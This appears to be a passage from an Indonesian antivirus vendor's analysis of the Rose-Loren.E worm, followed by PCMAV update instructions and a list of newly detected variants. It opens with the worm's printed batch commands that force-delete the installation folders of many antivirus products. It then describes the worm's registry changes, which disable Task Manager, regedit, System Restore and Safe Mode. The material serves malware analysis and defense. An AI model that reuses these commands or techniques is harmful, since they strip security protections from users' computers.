    del /f /q /s /a:h  C:\mcafee~1\*.* >nul
    del /f /q /s /a:h  C:\msav\*.* >nul
    del /f /q /s /a:h  C:\norman\*.* >nul
    del /f /q /s /a:h  C:\norton~1\*.* >nul
    del /f /q /s /a:h  C:\norton~2\*.* >nul
    del /f /q /s /a:h  C:\pav\*.* >nul
    del /f /q /s /a:h  C:\pccill~1\*.* >nul
    del /f /q /s /a:h  C:\pc-cil~1\*.* >nul
    del /f /q /s /a:h  C:\iolo\*.* >nul
    del /f /q /s /a:h  C:\progra~1\ESET\*.* >nul
    del /f /q /s /a:h  C:\progra~1\antivi~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\antivi~2\*.* >nul
    del /f /q /s /a:h  C:\progra~1\avg\*.* >nul
    del /f /q /s /a:h  C:\progra~1\kasper~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\kasper~2\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee.com\agent\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee.com\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mcafee~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\mindso~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\norman\*.* >nul
    del /f /q /s /a:h  C:\progra~1\norton~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\norton~2\*.* >nul
    del /f /q /s /a:h  C:\progra~1\pandas~1\*.* >nul
    del /f /q /s /a:h  C:\Progra~1\Alwils~1\*.* >nul
    del /f /q /s /a:h  C:\progra~1\iolo\*.* >nul
    del /f /q /s /a:R  C:\ESET\*.* >nul
    del /f /q /s /a:R  C:\antivi~1\*.* >nul
    del /f /q /s /a:R  C:\antivi~2\*.* >nul
    del /f /q /s /a:R  C:\antiviru\*.* >nul
    del /f /q /s /a:R  C:\avg\*.* >nul
    del /f /q /s /a:R  C:\kasper~1\*.* >nul
    del /f /q /s /a:R  C:\kasper~2\*.* >nul
    del /f /q /s /a:R  C:\mcafee\*.* >nul
    del /f /q /s /a:R  C:\mcafee.com\agent\*.* >nul
    del /f /q /s /a:R  C:\mcafee.com\*.* >nul
    del /f /q /s /a:R  C:\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:R  C:\mcafee~1\*.* >nul
    del /f /q /s /a:R  C:\msav\*.* >nul
    del /f /q /s /a:R  C:\norman\*.* >nul
    del /f /q /s /a:R  C:\norton~1\*.* >nul
    del /f /q /s /a:R  C:\norton~2\*.* >nul
    del /f /q /s /a:R  C:\pav\*.* >nul
    del /f /q /s /a:R  C:\pccill~1\*.* >nul
    del /f /q /s /a:R  C:\pc-cil~1\*.* >nul
    del /f /q /s /a:R  C:\iolo\*.* >nul
    del /f /q /s /a:R  C:\progra~1\ESET\*.* >nul
    del /f /q /s /a:R  C:\progra~1\antivi~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\antivi~2\*.* >nul
    del /f /q /s /a:R  C:\progra~1\avg\*.* >nul
    del /f /q /s /a:R  C:\progra~1\kasper~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\kasper~2\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee.com\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee.com\agent\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee.com\VSO\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mcafee~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\mindso~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\norman\*.* >nul
    del /f /q /s /a:R  C:\progra~1\norton~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\norton~2\*.* >nul
    del /f /q /s /a:R  C:\progra~1\pandas~1\*.* >nul
    del /f /q /s /a:R  C:\Progra~1\Alwils~1\*.* >nul
    del /f /q /s /a:R  C:\progra~1\iolo\*.* >nul
  • Jika ditemukan folder WinRar pada folder Program Files, maka Rose-Loren akan langsung mengcopykan file data.exe data.exe dan file gambar rose.jpg.
    Rose-Loren.E - Image Rose
  • Membuat file dengan nama private.zip yang isinya file worm dengan nama data.exe pada setiap drive termasuk di flash disk.
  • Membuat file dengan nama myrose.html, dan di dalamnya tersisip pesan berupa puisi cinta yang akan terlihat jika membuka code htmlnya.Rose-Loren.E - HTMLRose-Loren.E - View Source
  • Merubah icon pada flash disk karena adanya file autorun.inf serta file desktop.ini yang merubah background flash disk menjadi bunga mawar. Yang berbeda adalah, biasanya, autorun.inf lebih berfungsi untuk memanggil file companion dari malware yang ada di flash disk, sedangkan Rose-Loren hanya membuat autorun untuk merubah icon flash disk.Rose-Loren.E - Flash DiskRose-Loren.E - Autorun
D. Hasil Infeksi
Worm ini banyak melakukan perubahan pada registry, terlihat pada Legal Notification sebelum tampilan logon screen yang selalu berubah ubah karena Rose-Loren.E melakukan random terhadap kalimat yang di injeksikan ke registry. Sebagai contoh adalah gambar ini:
Rose-Loren.E - Logon
Text yang dirandom adalah:
  • Ambillah waktu untuk belajar, itu adalah sumber kebijaksanaan.
  • Hiduplah seperti lilin menerangi orang lain, janganlah hidup seperti duri menusuk diri dan menyakiti orang lain
  • Mahkota kemanusiaan ialah rendah hati
  • Yang telah berlalu biarkan ia berlalu, yang mendatang hadapi dengan cemerlang
  • Kawan sejati ialah orang yang mencintaimu meskipun telah mengenalmu dengan sebenar-benarnya yaitu baik dan burukmu
  • Sabar adalah jalan keluar bagi orang yang tidak bisa menemukan jalan keluar.
  • Seekor burung di tangan lebih baik daripada sepuluh ekor di atas pohon.
  • Hidup ini adalah warna-warni yang tergores pada kanvas, walaupun tidak cantik ia tetap mempunyai sejuta makna
  • Sebelum memberi nasihat kepada manusia dengan ucapanmu, berilah mereka nasihat dengan perbuatanmu.
  • Harta yang paling menguntungkan ialah SABAR. Teman yang paling akrab adalah AMAL.
  • Pengawal peribadi yang paling waspada DIAM. Bahasa yang paling manis SENYUM. Dan ibadah yang paling indah tentunya KHUSYUK.
  • Apabila kepercayaan telah hilang lenyap, kehormatan telah musnah, maka matilah orang itu -Whittier
  • Jangan sekali-kali kita meremehkan sesuatu perbuatan baik walaupun hanya sekadar senyuman.
  • Anda bukan apa yang anda fikirkan tentang anda, tetapi apa yang anda fikirkan itulah anda
  • Ambillah waktu untuk berdoa, itu adalah sumber ketenangan.
  • Hidup tak selalunya indah tapi yang indah itu tetap hidup dalam kenangan.
  • Biarpun jalan itu panjang, kita akan merintisnya perlahan-lahan.
  • Berfikir sejenak, merenung masa lalu adalah awal yang baik untuk bertindak
  • Dalam kerendahan hati ada ketinggian budi. Dalam kemiskinan harta ada kekayaan jiwa. Dalam kesempitan hidup ada kekuasaan ilmu.
  • Kegagalan dalam kemuliaan lebih baik daripada kejayaan dalam kehinaan.
  • Seseorang yang melakukan kesalahan dan tidak membetulkannya, Sesungguhnya Ia telah melakukan satu kesalahan lagi. – Confucius
  • Ambillah waktu untuk bermain, itu adalah rahsia dari masa muda yang abadi.
  • Selemah-lemah manusia ialah orang yg tak bisa mencari sahabat dan orang yang lebih lemah dari itu ialah orang yg mensia-siakan sahabat yg telah dicari (Saidia Ali)
  • Ambillah waktu untuk berfikir, itu adalah sumber kekuatan.
  • Ambillah waktu untuk mencintai dan dicintai, itu adalah hak istimewa yang diberikan Tuhan.
  • Ambillah waktu untuk bersahabat, itu adalah jalan menuju kebahagiaan.
  • Ambillah waktu untuk tertawa, itu adalah musik yang menggetarkan hati.
  • Ambillah waktu untuk memberi, itu adalah membuat hidup terasa bererti.
  • Ambillah waktu untuk bekerja, itu adalah nilai keberhasilan.
  • Ambillah waktu untuk beramal, itu adalah kunci menuju syurga.
  • Cinta tidak berupa tatapan satu sama lain, tetapi memandang ke luar bersama ke arah yang sama.
  • Persahabatan sering berakhir dengan cinta Tetapi cinta tidak pernah berakhir dengan persahabatan
  • Cobalah bernalar tentang cinta dan engkau pun akan kehilangan nalarmu
  • Jangan pernah bilang ‘Cinta’ kalau kamu tidak perduli.
  • Jangan pernah menyentuh hidup seseorang kalau hal itu akan melukai hatinya.
  • Jangan pernah menatap matanya kalau semua yang kamu lakukan hanya berbohong.
Worm juga menghilangkan beberapa menu pada Folder Options.
Rose-Loren.E - Folder Options
Payload lainnya adalah merubah tampilan properties pada My Computers.
Rose-Loren.E - System
Beberapa registry juga diubah, termasuk mendisable beberapa sistem Windows.
  • Regedit.exe
  • Msconfig.exe
  • taskmgr.exe
  • ntvdm.exe
  • rstrui.exe
  • EnableExtensions
  • FolderContentsInfoTip
  • NoRun
  • NoFind
  • DisableCurrentUserRun
  • HideFileExt
  • FolderSizeTip
  • ShowFullPathAddress
  • ShowFullPath
  • Disable SafeMode
  • Disable Show Hidden and Super Hidden files.
Worm juga akan membuat startup dengan nama WinUp dan RsWin.
E. Pembersihan
Mulai PCMAV 4.7 Update Build1, Rose-Loren.E beserta file-file companionnya telah dapat dikenali dan dibersihkan dari sistem komputer Anda.
Rose-Loren.E - Detected
PCMAV 4.7 Update Build1
Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 4.7 Update Build1 telah hadir dengan penambahan 72 pengenal varian virus baru. Bagi Anda pengguna PCMAV 4.7, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:
SendSpace.com
ZippyShare.com (mirror)
Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.
Daftar tambahan virus hingga PCMAV 4.7 Update Build1:
AlamarPica.vbs
AnitaLoroaji
AnitaLoroaji.inf
Autoit-Cyrillic
Autoit-ReplaceIcon.D
Autoit-ReplaceIcon.E
Autoit-ReplaceIcon.F
Autoit.FD
Autoit.FD.ini
Autoit.FE
Autoit.FE.serv
Cobax.exe.C
Dhoos
Dhoos.dll
Dhoos.url.A
Dhoos.url.B
Dhoos.url.C
FakeAV
FakeAV-Downloader.K
FakeAV-Downloader.K.dat
FakeAV-Downloader.K.dll.A
FakeAV-Downloader.K.dll.B
FakeAV-Downloader.K.dll.C
FakeAV-Downloader.K.job
FakeAV-Downloader.K.lnk.A
FakeAV-Downloader.K.lnk.B
FakeAV-Downloader.K.lnk.C
FakeAV-Downloader.K.lnk.D
FakeAV-Downloader.K.ref
FakeAV-Downloader.K.rtf
FakeAV-Downloader.K.setup
FakeAV-Downloader.K.unins
FakeAV-Downloader.K.url
Fakhricker.vbs
Gabest.B
GavGent-HVM31
GXRG-Snow.vbs
GXRG-Snow.vbs.host
GXRG-Snow.vbs.inf
GXRG.vbs
GXRG.vbs.inf
H323
H323.bat
KefiUnique.vbs
KefiUnique.vbs.txt
KefiUnique.vbs.upd
Lz32.vbs.B
Lz32.vbs.C
Ossep.vbs
Ossep.vbs.inf
Ramnit.A.Variant
Ramnit.B.Variant
Ramnit.C.Variant
Ramnit.D.Variant
Ramnit.E.Variant
Ronkor.C
Ronkor.C.htt
Ronkor.C.txt
Rose-Loren.E
TripleExe
TripleExe.inf
VB-Shortcut-1.lnk
XSample.vbs
XSample.vbs.inf
XSample.vbs.ini
XSample.vbs.lnk.A
XSample.vbs.lnk.B
XSample.vbs.lnk.C
XSample.vbs.lnk.D
XSample.vbs.lnk.E
XSample.vbs.lnk.F
XSample.vbs.mp3